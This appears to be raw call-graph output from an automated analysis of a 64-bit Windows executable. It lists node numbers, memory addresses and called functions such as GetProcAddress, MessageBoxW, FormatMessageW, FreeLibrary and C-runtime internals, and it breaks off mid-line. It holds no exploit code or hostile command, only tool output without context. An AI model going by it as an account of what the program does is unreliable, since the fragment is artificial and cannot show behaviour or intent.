15117->15118 15128 7ff7ace82790 15127->15128 15129 7ff7ace93b14 49 API calls 15128->15129 15130 7ff7ace827dd memcpy_s 15129->15130 15131 7ff7ace879a0 57 API calls 15130->15131 15132 7ff7ace8280a 15131->15132 15133 7ff7ace82849 MessageBoxA 15132->15133 15134 7ff7ace8280f 15132->15134 15136 7ff7ace82863 15133->15136 15135 7ff7ace879a0 57 API calls 15134->15135 15137 7ff7ace82829 MessageBoxW 15135->15137 15138 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15136->15138 15137->15136 15139 7ff7ace82873 15138->15139 15139->14949 15141 7ff7ace83c9c 15140->15141 15142 7ff7ace879a0 57 API calls 15141->15142 15143 7ff7ace83cc7 15142->15143 15144 7ff7ace879a0 57 API calls 15143->15144 15145 7ff7ace83cda 15144->15145 16842 7ff7ace953f8 15145->16842 15148 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15149 7ff7ace837ba 15148->15149 15149->14918 15150 7ff7ace87170 15149->15150 15151 7ff7ace87194 15150->15151 15152 7ff7ace8f864 73 API calls 15151->15152 15154 7ff7ace8726b __std_exception_copy 15151->15154 15153 7ff7ace871ae 15152->15153 15153->15154 17221 7ff7ace97868 15153->17221 15154->14922 15156 7ff7ace8f864 73 API calls 15158 7ff7ace871c3 15156->15158 15157 7ff7ace8f52c _fread_nolock 53 API calls 15157->15158 15158->15154 15158->15156 15158->15157 15160 7ff7ace8f20c 15159->15160 17236 7ff7ace8efb8 15160->17236 15162 7ff7ace8f225 15162->14918 15164 7ff7ace83277 15163->15164 15165 7ff7ace832a0 15163->15165 15164->15165 15166 7ff7ace81780 59 API calls 15164->15166 15165->14899 15166->15164 15168 7ff7ace85ae4 15167->15168 15172 7ff7ace85b11 15167->15172 15169 7ff7ace85b0c 15168->15169 15170 7ff7ace81780 59 API calls 15168->15170 15168->15172 15176 7ff7ace85b07 __std_exception_copy memcpy_s 15168->15176 17247 7ff7ace812b0 15169->17247 15170->15168 15172->15176 17273 7ff7ace83d10 15172->17273 15174 7ff7ace85b77 15175 7ff7ace82770 59 API calls 15174->15175 15174->15176 15175->15176 15176->14921 15183 7ff7ace8563a memcpy_s 15177->15183 15179 7ff7ace8575f 15181 7ff7ace83d10 49 API calls 15179->15181 15180 7ff7ace8577b 15184 7ff7ace82770 59 API calls 15180->15184 15182 7ff7ace857d8 15181->15182 15187 7ff7ace83d10 49 API calls 15182->15187 15183->15179 15183->15180 15185 7ff7ace83d10 49 API calls 15183->15185 15186 7ff7ace85740 15183->15186 15194 7ff7ace81440 161 API calls 15183->15194 15195 7ff7ace85761 15183->15195 17276 7ff7ace81650 15183->17276 15189 7ff7ace85771 __std_exception_copy 15184->15189 15185->15183 15186->15179 15188 7ff7ace83d10 49 API calls 15186->15188 15191 7ff7ace85808 15187->15191 15188->15179 15190 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15189->15190 15192 7ff7ace838b9 15190->15192 15193 7ff7ace83d10 49 API calls 15191->15193 15192->14932 15192->14933 15193->15189 15194->15183 15196 7ff7ace82770 59 API calls 15195->15196 15196->15189 17281 7ff7ace87120 15197->17281 15199 7ff7ace855c2 15200 7ff7ace87120 58 API calls 15199->15200 15201 7ff7ace855d5 15200->15201 15202 7ff7ace855fa 15201->15202 15203 7ff7ace855ed GetProcAddress 15201->15203 15204 7ff7ace82770 59 API calls 15202->15204 15207 7ff7ace85f7c GetProcAddress 15203->15207 15208 7ff7ace85f59 15203->15208 15206 7ff7ace85606 15204->15206 15206->14939 15207->15208 15209 7ff7ace85fa1 GetProcAddress 15207->15209 15210 7ff7ace82620 57 API calls 15208->15210 15209->15208 15211 7ff7ace85fc6 GetProcAddress 15209->15211 15213 7ff7ace85f6c 15210->15213 15211->15208 15212 7ff7ace85fee GetProcAddress 15211->15212 15212->15208 15214 7ff7ace86016 GetProcAddress 15212->15214 15213->14939 15214->15208 15215 7ff7ace8603e GetProcAddress 15214->15215 15216 7ff7ace8605a 15215->15216 15217 7ff7ace86066 GetProcAddress 15215->15217 15216->15217 15218 7ff7ace8608e GetProcAddress 15217->15218 15219 7ff7ace86082 15217->15219 15220 7ff7ace860aa 15218->15220 15221 7ff7ace860b6 GetProcAddress 15218->15221 15219->15218 15220->15221 15222 7ff7ace860de GetProcAddress 15221->15222 15223 7ff7ace860d2 15221->15223 15224 7ff7ace860fa 15222->15224 15225 7ff7ace86106 GetProcAddress 15222->15225 15223->15222 15224->15225 15226 7ff7ace8612e GetProcAddress 15225->15226 15227 7ff7ace86122 15225->15227 15228 7ff7ace8614a 15226->15228 15229 7ff7ace86156 GetProcAddress 15226->15229 15227->15226 15228->15229 15266 7ff7ace85c94 15265->15266 15267 7ff7ace82770 59 API calls 15266->15267 15270 7ff7ace838da 15266->15270 15268 7ff7ace85cee 15267->15268 15269 7ff7ace85870 FreeLibrary 15268->15269 15269->15270 15270->14917 15272 7ff7ace85882 15271->15272 15273 7ff7ace8589d 15271->15273 15272->15273 15275 7ff7ace85960 15272->15275 17285 7ff7ace87100 FreeLibrary 15272->17285 15273->14917 15275->15273 17286 7ff7ace87100 FreeLibrary 15275->17286 15278 7ff7ace81b55 15277->15278 15279 7ff7ace93b14 49 API calls 15278->15279 15280 7ff7ace81b78 15279->15280 15280->14938 17287 7ff7ace84940 15281->17287 15284 7ff7ace830dd 15284->14945 15286 7ff7ace830b4 15286->15284 17343 7ff7ace846c0 15286->17343 15288 7ff7ace830c0 15288->15284 17353 7ff7ace84820 15288->17353 15290 7ff7ace830cc 15290->15284 15291 7ff7ace8331c 15290->15291 15292 7ff7ace83307 15290->15292 15294 7ff7ace8333c 15291->15294 15306 7ff7ace83352 __std_exception_copy 15291->15306 15293 7ff7ace82770 59 API calls 15292->15293 15298 7ff7ace83313 __std_exception_copy 15293->15298 15296 7ff7ace82770 59 API calls 15294->15296 15295 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15296->15298 15298->15295 15299 7ff7ace81780 59 API calls 15299->15306 15300 7ff7ace812b0 122 API calls 15300->15306 15301 7ff7ace81b30 49 API calls 15301->15306 15302 7ff7ace835eb 15304 7ff7ace835c5 15306->15298 15306->15299 15306->15300 15306->15301 15306->15302 15306->15304 15307 7ff7ace834b6 15306->15307 15355 7ff7ace8ad00 15336->15355 15339 7ff7ace82669 15357 7ff7ace93b14 15339->15357 15344 7ff7ace81b30 49 API calls 15345 7ff7ace826c8 memcpy_s 15344->15345 15346 7ff7ace879a0 54 API calls 15345->15346 15347 7ff7ace826f5 15346->15347 15348 7ff7ace826fa 15347->15348 15349 7ff7ace82734 MessageBoxA 15347->15349 15350 7ff7ace879a0 54 API calls 15348->15350 15351 7ff7ace8274e 15349->15351 15352 7ff7ace82714 MessageBoxW 15350->15352 15353 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15351->15353 15352->15351 15354 7ff7ace8275e 15353->15354 15354->15009 15356 7ff7ace8263c GetLastError 15355->15356 15356->15339 15361 7ff7ace93b6e 15357->15361 15358 7ff7ace93b93 15359 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15358->15359 15364 7ff7ace93bbd 15359->15364 15360 7ff7ace93bcf 15387 7ff7ace91da0 15360->15387 15361->15358 15361->15360 15363 7ff7ace93cac 15366 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15363->15366 15365 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15364->15365 15367 7ff7ace82699 15365->15367 15366->15364 15375 7ff7ace87420 15367->15375 15369 7ff7ace93cd0 15369->15363 15371 7ff7ace93cda 15369->15371 15370 7ff7ace93c81 15372 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15370->15372 15374 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15371->15374 15372->15364 15373 7ff7ace93c78 15373->15363 15373->15370 15374->15364 15376 7ff7ace8742c 15375->15376 15377 7ff7ace8744d FormatMessageW 15376->15377 15378 7ff7ace87447 GetLastError 15376->15378 15379 7ff7ace8749c WideCharToMultiByte 15377->15379 15380 7ff7ace87480 15377->15380 15378->15377 15382 7ff7ace874d6 15379->15382 15383 7ff7ace87493 15379->15383 15381 7ff7ace82620 54 API calls 15380->15381 15381->15383 15384 7ff7ace82620 54 API calls 15382->15384 15385 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15383->15385 15384->15383 15386 7ff7ace826a0 15385->15386 15386->15344 15388 7ff7ace91dde 15387->15388 15389 7ff7ace91dce 15387->15389 15390 7ff7ace91de7 15388->15390 15394 7ff7ace91e15 15388->15394 15393 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15389->15393 15391 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15390->15391 15392 7ff7ace91e0d 15391->15392 15392->15363 15392->15369 15392->15370 15392->15373 15393->15392 15394->15389 15394->15392 15397 7ff7ace920c4 15394->15397 15401 7ff7ace92730 15394->15401 15427 7ff7ace923f8 15394->15427 15457 7ff7ace91c80 15394->15457 15460 7ff7ace93950 15394->15460 15399 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15397->15399 15399->15389 15402 7ff7ace92772 15401->15402 15403 7ff7ace927e5 15401->15403 15404 7ff7ace9280f 15402->15404 15405 7ff7ace92778 15402->15405 15406 7ff7ace9283f 15403->15406 15407 7ff7ace927ea 15403->15407 15484 7ff7ace90ce0 15404->15484 15414 7ff7ace9277d 15405->15414 15418 7ff7ace9284e 15405->15418 15406->15404 15406->15418 15425 7ff7ace927a8 15406->15425 15408 7ff7ace9281f 15407->15408 15409 7ff7ace927ec 15407->15409 15491 7ff7ace908d0 15408->15491 15411 7ff7ace9278d 15409->15411 15417 7ff7ace927fb 15409->15417 15426 7ff7ace9287d 15411->15426 15466 7ff7ace93094 15411->15466 15414->15411 15415 7ff7ace927c0 15414->15415 15414->15425 15415->15426 15476 7ff7ace93550 15415->15476 15417->15404 15420 7ff7ace92800 15417->15420 15418->15426 15498 7ff7ace910f0 15418->15498 15420->15426 15480 7ff7ace936e8 15420->15480 15421 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15422 7ff7ace92b13 15421->15422 15422->15394 15425->15426 15505 7ff7ace9d930 15425->15505 15426->15421 15428 7ff7ace92403 15427->15428 15429 7ff7ace92419 15427->15429 15430 7ff7ace92457 15428->15430 15431 7ff7ace92772 15428->15431 15432 7ff7ace927e5 15428->15432 15429->15430 15433 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15429->15433 15430->15394 15434 7ff7ace9280f 15431->15434 15435 7ff7ace92778 15431->15435 15436 7ff7ace9283f 15432->15436 15437 7ff7ace927ea 15432->15437 15433->15430 15440 7ff7ace90ce0 38 API calls 15434->15440 15439 7ff7ace9284e 15435->15439 15444 7ff7ace9277d 15435->15444 15436->15434 15436->15439 15455 7ff7ace927a8 15436->15455 15438 7ff7ace9281f 15437->15438 15441 7ff7ace927ec 15437->15441 15442 7ff7ace908d0 38 API calls 15438->15442 15446 7ff7ace910f0 38 API calls 15439->15446 15456 7ff7ace9287d 15439->15456 15440->15455 15447 7ff7ace927fb 15441->15447 15448 7ff7ace9278d 15441->15448 15442->15455 15443 7ff7ace93094 47 API calls 15443->15455 15445 7ff7ace927c0 15444->15445 15444->15448 15444->15455 15449 7ff7ace93550 47 API calls 15445->15449 15445->15456 15446->15455 15447->15434 15450 7ff7ace92800 15447->15450 15448->15443 15448->15456 15449->15455 15452 7ff7ace936e8 37 API calls 15450->15452 15450->15456 15451 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15453 7ff7ace92b13 15451->15453 15452->15455 15453->15394 15454 7ff7ace9d930 47 API calls 15454->15455 15455->15454 15455->15456 15456->15451 15654 7ff7ace8fea4 15457->15654 15461 7ff7ace93967 15460->15461 15671 7ff7ace9ca90 15461->15671 15467 7ff7ace930b6 15466->15467 15515 7ff7ace8fd10 15467->15515 15472 7ff7ace93950 45 API calls 15473 7ff7ace931f3 15472->15473 15474 7ff7ace93950 45 API calls 15473->15474 15475 7ff7ace9327c 15473->15475 15474->15475 15475->15425 15477 7ff7ace93568 15476->15477 15479 7ff7ace935d0 15476->15479 15478 7ff7ace9d930 47 API calls 15477->15478 15477->15479 15478->15479 15479->15425 15483 7ff7ace93709 15480->15483 15481 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15482 7ff7ace9373a 15481->15482 15482->15425 15483->15481 15483->15482 15485 7ff7ace90d13 15484->15485 15486 7ff7ace90d42 15485->15486 15488 7ff7ace90dff 15485->15488 15487 7ff7ace8fd10 12 API calls 15486->15487 15490 7ff7ace90d7f 15486->15490 15487->15490 15489 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15488->15489 15489->15490 15490->15425 15492 7ff7ace90903 15491->15492 15493 7ff7ace90932 15492->15493 15495 7ff7ace909ef 15492->15495 15494 7ff7ace8fd10 12 API calls 15493->15494 15496 7ff7ace9096f 15493->15496 15494->15496 15497 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15495->15497 15496->15425 15497->15496 15499 7ff7ace91123 15498->15499 15500 7ff7ace91152 15499->15500 15502 7ff7ace9120f 15499->15502 15501 7ff7ace8fd10 12 API calls 15500->15501 15504 7ff7ace9118f 15500->15504 15501->15504 15503 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15502->15503 15503->15504 15504->15425 15506 7ff7ace9d958 15505->15506 15507 7ff7ace9d99d 15506->15507 15508 7ff7ace9d95d memcpy_s 15506->15508 15510 7ff7ace93950 45 API calls 15506->15510 15511 7ff7ace9d986 memcpy_s 15506->15511 15507->15508 15507->15511 15651 7ff7ace9efe8 15507->15651 15508->15425 15509 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15509->15508 15510->15507 15511->15508 15511->15509 15516 7ff7ace8fd36 15515->15516 15517 7ff7ace8fd47 15515->15517 15523 7ff7ace9d648 15516->15523 15517->15516 15518 7ff7ace9c9fc _fread_nolock 12 API calls 15517->15518 15519 7ff7ace8fd74 15518->15519 15520 7ff7ace8fd88 15519->15520 15521 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15519->15521 15522 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15520->15522 15521->15520 15522->15516 15524 7ff7ace9d665 15523->15524 15525 7ff7ace9d698 15523->15525 15526 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15524->15526 15525->15524 15527 7ff7ace9d6ca 15525->15527 15535 7ff7ace931d1 15526->15535 15531 7ff7ace9d7dd 15527->15531 15540 7ff7ace9d712 15527->15540 15528 7ff7ace9d8cf 15578 7ff7ace9cb34 15528->15578 15530 7ff7ace9d895 15571 7ff7ace9cecc 15530->15571 15531->15528 15531->15530 15533 7ff7ace9d864 15531->15533 15534 7ff7ace9d827 15531->15534 15537 7ff7ace9d81d 15531->15537 15564 7ff7ace9d1ac 15533->15564 15554 7ff7ace9d3dc 15534->15554 15535->15472 15535->15473 15537->15530 15539 7ff7ace9d822 15537->15539 15539->15533 15539->15534 15540->15535 15545 7ff7ace990dc 15540->15545 15543 7ff7ace99d00 _wfindfirst32i64 17 API calls 15544 7ff7ace9d92c 15543->15544 15546 7ff7ace990f3 15545->15546 15547 7ff7ace990e9 15545->15547 15548 7ff7ace94374 _get_daylight 11 API calls 15546->15548 15547->15546 15552 7ff7ace9910e 15547->15552 15549 7ff7ace990fa 15548->15549 15550 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15549->15550 15551 7ff7ace99106 15550->15551 15551->15535 15551->15543 15552->15551 15553 7ff7ace94374 _get_daylight 11 API calls 15552->15553 15553->15549 15587 7ff7acea30fc 15554->15587 15558 7ff7ace9d484 15559 7ff7ace9d4d9 15558->15559 15560 7ff7ace9d4a4 15558->15560 15563 7ff7ace9d488 15558->15563 15640 7ff7ace9cfc8 15559->15640 15636 7ff7ace9d284 15560->15636 15563->15535 15565 7ff7acea30fc 38 API calls 15564->15565 15566 7ff7ace9d1f6 15565->15566 15567 7ff7acea2b44 37 API calls 15566->15567 15568 7ff7ace9d246 15567->15568 15569 7ff7ace9d24a 15568->15569 15570 7ff7ace9d284 45 API calls 15568->15570 15569->15535 15570->15569 15572 7ff7acea30fc 38 API calls 15571->15572 15573 7ff7ace9cf17 15572->15573 15574 7ff7acea2b44 37 API calls 15573->15574 15575 7ff7ace9cf6f 15574->15575 15576 7ff7ace9cf73 15575->15576 15577 7ff7ace9cfc8 45 API calls 15575->15577 15576->15535 15577->15576 15579 7ff7ace9cb79 15578->15579 15580 7ff7ace9cbac 15578->15580 15581 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15579->15581 15582 7ff7ace9cbc4 15580->15582 15585 7ff7ace9cc45 15580->15585 15584 7ff7ace9cba5 memcpy_s 15581->15584 15583 7ff7ace9cecc 46 API calls 15582->15583 15583->15584 15584->15535 15585->15584 15586 7ff7ace93950 45 API calls 15585->15586 15586->15584 15588 7ff7acea314f fegetenv 15587->15588 15589 7ff7acea705c 37 API calls 15588->15589 15590 7ff7acea31a2 15589->15590 15591 7ff7acea3292 15590->15591 15596 7ff7acea31bd 15590->15596 15597 7ff7acea326c 15590->15597 15592 7ff7acea705c 37 API calls 15591->15592 15594 7ff7acea32bc 15592->15594 15593 7ff7acea31cf 15595 7ff7ace990dc __std_exception_copy 37 API calls 15593->15595 15598 7ff7acea705c 37 API calls 15594->15598 15599 7ff7acea324d 15595->15599 15596->15591 15596->15593 15600 7ff7ace990dc __std_exception_copy 37 API calls 15597->15600 15601 7ff7acea32cd 15598->15601 15602 7ff7acea4374 15599->15602 15606 7ff7acea3255 15599->15606 15600->15599 15604 7ff7acea7250 20 API calls 15601->15604 15603 7ff7ace99d00 _wfindfirst32i64 17 API calls 15602->15603 15605 7ff7acea4389 15603->15605 15614 7ff7acea3336 memcpy_s 15604->15614 15607 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15606->15607 15608 7ff7ace9d429 15607->15608 15632 7ff7acea2b44 15608->15632 15609 7ff7acea36df memcpy_s 15610 7ff7acea3a1f 15612 7ff7acea2c60 37 API calls 15610->15612 15611 7ff7acea3377 memcpy_s 15627 7ff7acea3cbb memcpy_s 15611->15627 15631 7ff7acea37d3 memcpy_s 15611->15631 15618 7ff7acea4137 15612->15618 15613 7ff7acea39cb 15613->15610 15615 7ff7acea438c memcpy_s 37 API calls 15613->15615 15614->15609 15614->15611 15616 7ff7ace94374 _get_daylight 11 API calls 15614->15616 15615->15610 15617 7ff7acea37b0 15616->15617 15619 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15617->15619 15621 7ff7acea438c memcpy_s 37 API calls 15618->15621 15625 7ff7acea4192 15618->15625 15619->15611 15620 7ff7acea4318 15624 7ff7acea705c 37 API calls 15620->15624 15621->15625 15622 7ff7ace94374 11 API calls _get_daylight 15622->15627 15623 7ff7ace94374 11 API calls _get_daylight 15623->15631 15624->15606 15625->15620 15626 7ff7acea2c60 37 API calls 15625->15626 15629 7ff7acea438c memcpy_s 37 API calls 15625->15629 15626->15625 15627->15610 15627->15613 15627->15622 15630 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 15627->15630 15628 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 15628->15631 15629->15625 15630->15627 15631->15613 15631->15623 15631->15628 15633 7ff7acea2b63 15632->15633 15634 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15633->15634 15635 7ff7acea2b8e memcpy_s 15633->15635 15634->15635 15635->15558 15637 7ff7ace9d2b0 memcpy_s 15636->15637 15638 7ff7ace93950 45 API calls 15637->15638 15639 7ff7ace9d36a memcpy_s 15637->15639 15638->15639 15639->15563 15641 7ff7ace9d003 15640->15641 15644 7ff7ace9d050 memcpy_s 15640->15644 15642 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15641->15642 15643 7ff7ace9d02f 15642->15643 15643->15563 15645 7ff7ace9d0bb 15644->15645 15647 7ff7ace93950 45 API calls 15644->15647 15646 7ff7ace990dc __std_exception_copy 37 API calls 15645->15646 15650 7ff7ace9d0fd memcpy_s 15646->15650 15647->15645 15648 7ff7ace99d00 _wfindfirst32i64 17 API calls 15649 7ff7ace9d1a8 15648->15649 15650->15648 15652 7ff7ace9f00c WideCharToMultiByte 15651->15652 15655 7ff7ace8fed1 15654->15655 15656 7ff7ace8fee3 15654->15656 15658 7ff7ace94374 _get_daylight 11 API calls 15655->15658 15657 7ff7ace8ff2d 15656->15657 15659 7ff7ace8fef0 15656->15659 15663 7ff7ace94374 _get_daylight 11 API calls 15657->15663 15670 7ff7ace8ffd6 15657->15670 15660 7ff7ace8fed6 15658->15660 15662 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15659->15662 15661 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15660->15661 15667 7ff7ace8fee1 15661->15667 15662->15667 15665 7ff7ace8ffcb 15663->15665 15664 7ff7ace94374 _get_daylight 11 API calls 15666 7ff7ace90080 15664->15666 15668 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15665->15668 15669 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15666->15669 15667->15394 15668->15670 15669->15667 15670->15664 15670->15667 15672 7ff7ace9caa9 15671->15672 15674 7ff7ace9398f 15671->15674 15672->15674 15679 7ff7acea2354 15672->15679 15675 7ff7ace9cafc 15674->15675 15676 7ff7ace9cb15 15675->15676 15677 7ff7ace9399f 15675->15677 15676->15677 15723 7ff7acea16c0 15676->15723 15677->15394 15691 7ff7ace9a550 GetLastError 15679->15691 15682 7ff7acea23ae 15682->15674 15692 7ff7ace9a591 FlsSetValue 15691->15692 15693 7ff7ace9a574 FlsGetValue 15691->15693 15695 7ff7ace9a5a3 15692->15695 15711 7ff7ace9a581 15692->15711 15694 7ff7ace9a58b 15693->15694 15693->15711 15694->15692 15697 7ff7ace9dc70 _get_daylight 11 API calls 15695->15697 15696 7ff7ace9a5fd SetLastError 15698 7ff7ace9a60a 15696->15698 15699 7ff7ace9a61d 15696->15699 15700 7ff7ace9a5b2 15697->15700 15698->15682 15713 7ff7ace9f6b8 EnterCriticalSection 15698->15713 15714 7ff7ace9913c 15699->15714 15702 7ff7ace9a5d0 FlsSetValue 15700->15702 15703 7ff7ace9a5c0 FlsSetValue 15700->15703 15704 7ff7ace9a5dc FlsSetValue 15702->15704 15705 7ff7ace9a5ee 15702->15705 15707 7ff7ace9a5c9 15703->15707 15704->15707 15708 7ff7ace9a2f4 _get_daylight 11 API calls 15705->15708 15709 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15707->15709 15710 7ff7ace9a5f6 15708->15710 15709->15711 15712 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15710->15712 15711->15696 15712->15696 15715 7ff7acea26a0 __GetCurrentState EnterCriticalSection LeaveCriticalSection 15714->15715 15716 7ff7ace99145 15715->15716 15717 7ff7ace99154 15716->15717 15718 7ff7acea26f0 __GetCurrentState 44 API calls 15716->15718 15719 7ff7ace99187 __GetCurrentState 15717->15719 15720 7ff7ace9915d IsProcessorFeaturePresent 15717->15720 15718->15717 15721 7ff7ace9916c 15720->15721 15722 7ff7ace99a14 _wfindfirst32i64 14 API calls 15721->15722 15722->15719 15724 7ff7ace9a550 __GetCurrentState 45 API calls 15723->15724 15725 7ff7acea16c9 15724->15725 15733 7ff7ace9421c EnterCriticalSection 15726->15733 15735 7ff7ace824ec 15734->15735 15736 7ff7ace93b14 49 API calls 15735->15736 15737 7ff7ace8253f 15736->15737 15738 7ff7ace94374 _get_daylight 11 API calls 15737->15738 15739 7ff7ace82544 15738->15739 15753 7ff7ace94394 15739->15753 15742 7ff7ace81b30 49 API calls 15743 7ff7ace82573 memcpy_s 15742->15743 15744 7ff7ace879a0 57 API calls 15743->15744 15745 7ff7ace825a0 15744->15745 15746 7ff7ace825a5 15745->15746 15747 7ff7ace825df MessageBoxA 15745->15747 15748 7ff7ace879a0 57 API calls 15746->15748 15749 7ff7ace825f9 15747->15749 15750 7ff7ace825bf MessageBoxW 15748->15750 15751 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15749->15751 15750->15749 15752 7ff7ace82609 15751->15752 15752->15022 15754 7ff7ace9a6c8 _get_daylight 11 API calls 15753->15754 15755 7ff7ace943ab 15754->15755 15756 7ff7ace8254b 15755->15756 15757 7ff7ace9dc70 _get_daylight 11 API calls 15755->15757 15759 7ff7ace943eb 15755->15759 15756->15742 15758 7ff7ace943e0 15757->15758 15760 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15758->15760 15759->15756 15765 7ff7ace9e348 15759->15765 15760->15759 15763 7ff7ace99d00 _wfindfirst32i64 17 API calls 15764 7ff7ace94430 15763->15764 15770 7ff7ace9e365 15765->15770 15766 7ff7ace9e36a 15767 7ff7ace94411 15766->15767 15768 7ff7ace94374 _get_daylight 11 API calls 15766->15768 15767->15756 15767->15763 15769 7ff7ace9e374 15768->15769 15771 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15769->15771 15770->15766 15770->15767 15772 7ff7ace9e3b4 15770->15772 15771->15767 15772->15767 15773 7ff7ace94374 _get_daylight 11 API calls 15772->15773 15773->15769 15775 7ff7ace87ad4 WideCharToMultiByte 15774->15775 15776 7ff7ace87b42 WideCharToMultiByte 15774->15776 15777 7ff7ace87afe 15775->15777 15780 7ff7ace87b15 15775->15780 15778 7ff7ace87b6f 15776->15778 15782 7ff7ace83be5 15776->15782 15779 7ff7ace82620 57 API calls 15777->15779 15781 7ff7ace82620 57 API calls 15778->15781 15779->15782 15780->15776 15783 7ff7ace87b2b 15780->15783 15781->15782 15782->15032 15782->15033 15784 7ff7ace82620 57 API calls 15783->15784 15784->15782 15786 7ff7ace869ee 15785->15786 15787 7ff7ace99053 15785->15787 15786->15052 15787->15786 15788 7ff7ace990dc __std_exception_copy 37 API calls 15787->15788 15789 7ff7ace99080 15788->15789 15789->15786 15790 7ff7ace99d00 _wfindfirst32i64 17 API calls 15789->15790 15791 7ff7ace990b0 15790->15791 15793 7ff7ace817d4 15792->15793 15794 7ff7ace817e4 15792->15794 15795 7ff7ace83c90 116 API calls 15793->15795 15796 7ff7ace87170 83 API calls 15794->15796 15824 7ff7ace81842 15794->15824 15795->15794 15797 7ff7ace81815 15796->15797 15797->15824 15826 7ff7ace8f864 15797->15826 15799 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15801 7ff7ace819c0 15799->15801 15800 7ff7ace8182b 15802 7ff7ace8184c 15800->15802 15803 7ff7ace8182f 15800->15803 15801->15067 15801->15068 15830 7ff7ace8f52c 15802->15830 15804 7ff7ace824d0 59 API calls 15803->15804 15804->15824 15807 7ff7ace8f864 73 API calls 15809 7ff7ace818d1 15807->15809 15808 7ff7ace824d0 59 API calls 15808->15824 15810 7ff7ace818fe 15809->15810 15811 7ff7ace818e3 15809->15811 15813 7ff7ace8f52c _fread_nolock 53 API calls 15810->15813 15812 7ff7ace824d0 59 API calls 15811->15812 15812->15824 15814 7ff7ace81913 15813->15814 15815 7ff7ace81867 15814->15815 15816 7ff7ace81925 15814->15816 15815->15808 15833 7ff7ace8f2a0 15816->15833 15819 7ff7ace8193d 15820 7ff7ace82770 59 API calls 15819->15820 15820->15824 15821 7ff7ace81993 15823 7ff7ace8f1dc 74 API calls 15821->15823 15821->15824 15822 7ff7ace81950 15822->15821 15825 7ff7ace82770 59 API calls 15822->15825 15823->15824 15824->15799 15825->15821 15827 7ff7ace8f894 15826->15827 15839 7ff7ace8f5f4 15827->15839 15829 7ff7ace8f8ad 15829->15800 15851 7ff7ace8f54c 15830->15851 15834 7ff7ace8f2a9 15833->15834 15835 7ff7ace81939 15833->15835 15836 7ff7ace94374 _get_daylight 11 API calls 15834->15836 15835->15819 15835->15822 15837 7ff7ace8f2ae 15836->15837 15838 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15837->15838 15838->15835 15840 7ff7ace8f65e 15839->15840 15841 7ff7ace8f61e 15839->15841 15840->15841 15843 7ff7ace8f66a 15840->15843 15842 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15841->15842 15844 7ff7ace8f645 15842->15844 15850 7ff7ace9421c EnterCriticalSection 15843->15850 15844->15829 15852 7ff7ace8f576 15851->15852 15863 7ff7ace81861 15851->15863 15853 7ff7ace8f5c2 15852->15853 15855 7ff7ace8f585 memcpy_s 15852->15855 15852->15863 15864 7ff7ace9421c EnterCriticalSection 15853->15864 15857 7ff7ace94374 _get_daylight 11 API calls 15855->15857 15858 7ff7ace8f59a 15857->15858 15860 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15858->15860 15860->15863 15863->15807 15863->15815 15957 7ff7ace86700 15865->15957 15867 7ff7ace81454 15868 7ff7ace81459 15867->15868 15966 7ff7ace86a20 15867->15966 15868->15092 15871 7ff7ace814a7 15873 7ff7ace814e0 15871->15873 15875 7ff7ace83c90 116 API calls 15871->15875 15872 7ff7ace81487 15874 7ff7ace824d0 59 API calls 15872->15874 15876 7ff7ace8f864 73 API calls 15873->15876 15877 7ff7ace8149d 15874->15877 15878 7ff7ace814bf 15875->15878 15879 7ff7ace814f2 15876->15879 15877->15092 15878->15873 15880 7ff7ace814c7 15878->15880 15881 7ff7ace81516 15879->15881 15882 7ff7ace814f6 15879->15882 15883 7ff7ace82770 59 API calls 15880->15883 15885 7ff7ace8151c 15881->15885 15886 7ff7ace81534 15881->15886 15884 7ff7ace824d0 59 API calls 15882->15884 15898 7ff7ace814d6 __std_exception_copy 15883->15898 15884->15898 15986 7ff7ace81050 15885->15986 15888 7ff7ace81556 15886->15888 15889 7ff7ace81575 15886->15889 15891 7ff7ace824d0 59 API calls 15888->15891 15894 7ff7ace8f52c _fread_nolock 